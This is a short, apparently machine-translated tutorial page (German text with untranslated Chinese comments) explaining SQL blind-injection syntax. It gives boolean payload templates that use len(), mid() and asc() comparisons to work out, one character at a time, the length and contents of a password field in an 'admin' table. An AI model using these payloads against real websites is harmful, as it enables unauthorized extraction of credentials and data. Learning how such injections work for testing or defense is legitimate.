Informationen zur SQL-Blindinjection-Syntax
- 藏色散人nach vorne
- 2020-04-03 13:16:512269Durchsuche
Wenn auf der Seite keine falschen Zahlen angezeigt werden, verwenden Sie die Blind-Injection-Syntax, um den Dateninhalt basierend auf Seitenänderungen zu bestimmen
Ermitteln Sie die Datenlänge:
and (select top 1 len(列名) from 表名)>5 and (select top 1 len(password) from admin)>16//错误 and (select top 1 len(password) from admin)>15//正常
Ermitteln Sie die angegebene Anzahl von Ziffern von Daten:
and (select top 1 asc(mid(列名,位置,1)) from 表名)>97 and (select top 1 asc(mid(admin,1,1)) from admin)>96//判断admin字段的内容第一位的ascii码值大于96 正常 and (select top 1 asc(mid(admin,1,1)) from admin)>97//判断admin字段的内容第一位的ascii码值大于97 错误 说明就是97
mid(字符串,截取的位置,截取字符数) asc() //将字符转换成ascii码 方便进行比较
Empfohlen: „MySQL-Video-Tutorial“
Das obige ist der detaillierte Inhalt vonInformationen zur SQL-Blindinjection-Syntax. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!
Stellungnahme:
Dieser Artikel ist reproduziert unter:cnblogs.com. Bei Verstößen wenden Sie sich bitte an admin@php.cn löschen
Vorheriger Artikel:Der Cloud-Server Centos7 erstellt eine MySQL-Datenbank (Lernaufzeichnung)Nächster Artikel:Der Cloud-Server Centos7 erstellt eine MySQL-Datenbank (Lernaufzeichnung)
In Verbindung stehende Artikel
Mehr sehen- Der Cloud-Server Centos7 erstellt eine MySQL-Datenbank (Lernaufzeichnung)
- Was soll ich tun, wenn VScode keine Verbindung zu nativem MSSQL herstellen kann?
- Was soll ich tun, wenn bei der Installation von MySQL auf Centos ein Fehler auftritt?
- Die Installation des MySQL-Servers unter Centos7 ist fehlgeschlagen